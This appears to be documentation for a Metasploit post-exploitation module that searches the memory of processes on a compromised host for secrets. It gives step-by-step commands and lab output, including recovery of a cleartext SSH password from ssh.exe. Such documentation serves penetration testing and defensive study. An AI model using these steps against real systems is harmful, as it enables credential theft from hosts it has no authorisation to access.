This module allows for searching the memory space of running processes using Meterpreter's
stdapi_sys_process_memory_search command for potentially sensitive data such as passwords.
- Start
msfconsole - Get a Meterpreter session
- Do:
use post/multi/gather/memory_search - Do:
set SESSION <Session ID> - Do:
set PROCESS_NAMES_GLOB <process_names_regex> - Do:
set PROCESS_IDS <Process ID> - Do:
set REGEX <regex> - Do:
run
Regular expression used to target processes. (default: ssh.*)
Comma delimited process ID/IDs to search through. (default: nil)
Regular expression to search for within memory. (default: publickey,password.*)
The minimum number of bytes to match. (default: 5)
The maximum number of bytes to match. (default: 127)
Replace non-printable bytes with ".". (default: true)
Save the memory matches to loot. (default: true)
In this scenario, the Windows target is connected to a different host using ssh.exe using the password myverysecretpassword:
msf6 post(multi/gather/memory_search) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB 192.168.112.1:4444 -> 192.168.112.129:55513 (192.168.112.129)
msf6 post(multi/gather/memory_search) > run session=-1 regex="publickey,password.*" process_ids='' process_names_glob="ssh.*"
[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
ssh.exe (pid: 4292)
[*] Memory Matches for ssh.exe (pid: 4292)
======================================
Match Address Match Length Match Buffer Memory Region Start Memory Region Size
------------- ------------ ------------ ------------------- ------------------
0x0000000A00060DF0 127 "publickey,password......3.......myverysecretpassword....................#.........#.......... 0x0000000A00000000 0x0000000000090000
...........S......................"
[*] Post module execution completed
In this scenario, the Windows target is running the http.server module in Python:
msf6 post(multi/gather/memory_search) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB 192.168.112.1:4444 -> 192.168.112.129:55513 (192.168.112.129)
msf6 post(multi/gather/memory_search) > run session=-1 regex="GET /.*" process_ids='' process_names_glob="python.*|[Ww]indows[Tt]erminal.*"
[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
WindowsTerminal.exe (pid: 9168)
python.exe (pid: 2816)
[*] Memory Matches for WindowsTerminal.exe (pid: 9168)
==================================================
Match Address Match Length Match Buffer Memory Region Start Memory Region Size
------------- ------------ ------------ ------------------- ------------------
0x00000121C3458649 127 "GET /.portable HTTP/1.1\" 200 -...::ffff:192.168.112.1 - - [17/Jan/2024 14:36:38] \"GET /favi 0x00000121C3449000 0x000000000001B000
con.ico HTTP/1.1\" 404 -..windows-ter"
[*] Memory Matches for python.exe (pid: 2816)
=========================================
Match Address Match Length Match Buffer Memory Region Start Memory Region Size
------------- ------------ ------------ ------------------- ------------------
0x0000013A0E3017D1 127 "GET /.portable HTTP/1.1\" 200 -.....:.....Q.:...................0.Q.:...0.Q.:.....Q.:.....Q.: 0x0000013A0E270000 0x00000000000FF000
...pAR.:...pAR.:...0.Q.:...0.Q.:..."
0x0000013A1063DC21 127 "GET /.portable HTTP/1.1\" 200 -...t-black.ico...`@l.:.....h.:..............&.............l.&. 0x0000013A105E0000 0x0000000000100000
....l.&.....l.&.....l.&......k.:..."
0x0000013A1063E5B1 127 "GET /.portable HTTP/1.1\" 200 -...b.l.e...o.....P.c.:...s.e.r.s.\\.w.i.n.1.0.\\.s.c.o.o.p.\\. 0x0000013A105E0000 0x0000000000100000
a.p.p.s.\\.w.i.n.d.o.w.s.-.t.e.r.m.i.n."
0x0000013A1067EC41 127 "GET /Images/ HTTP/1.1\" 200 -...@.g.:...p..&....2.................012345........<li><a href=\ 0x0000013A105E0000 0x0000000000100000
"defaults.json\">defaults.json</a></l"
0x0000013A106CADD0 127 "GET /.portable HTTP/1.1...p&.............x..:...P...:...0.l.:....ta$.e$j..k.:... lk.:........ 0x0000013A105E0000 0x0000000000100000
...0.l.:......................&..."
0x0000013A106CF940 127 "GET /.portable HTTP/1.1...........l.:...................Pf.&.....^.&......e.:................ 0x0000013A105E0000 0x0000000000100000
....Sn&....s.......P.l.:...p..&..."
[*] Post module execution completed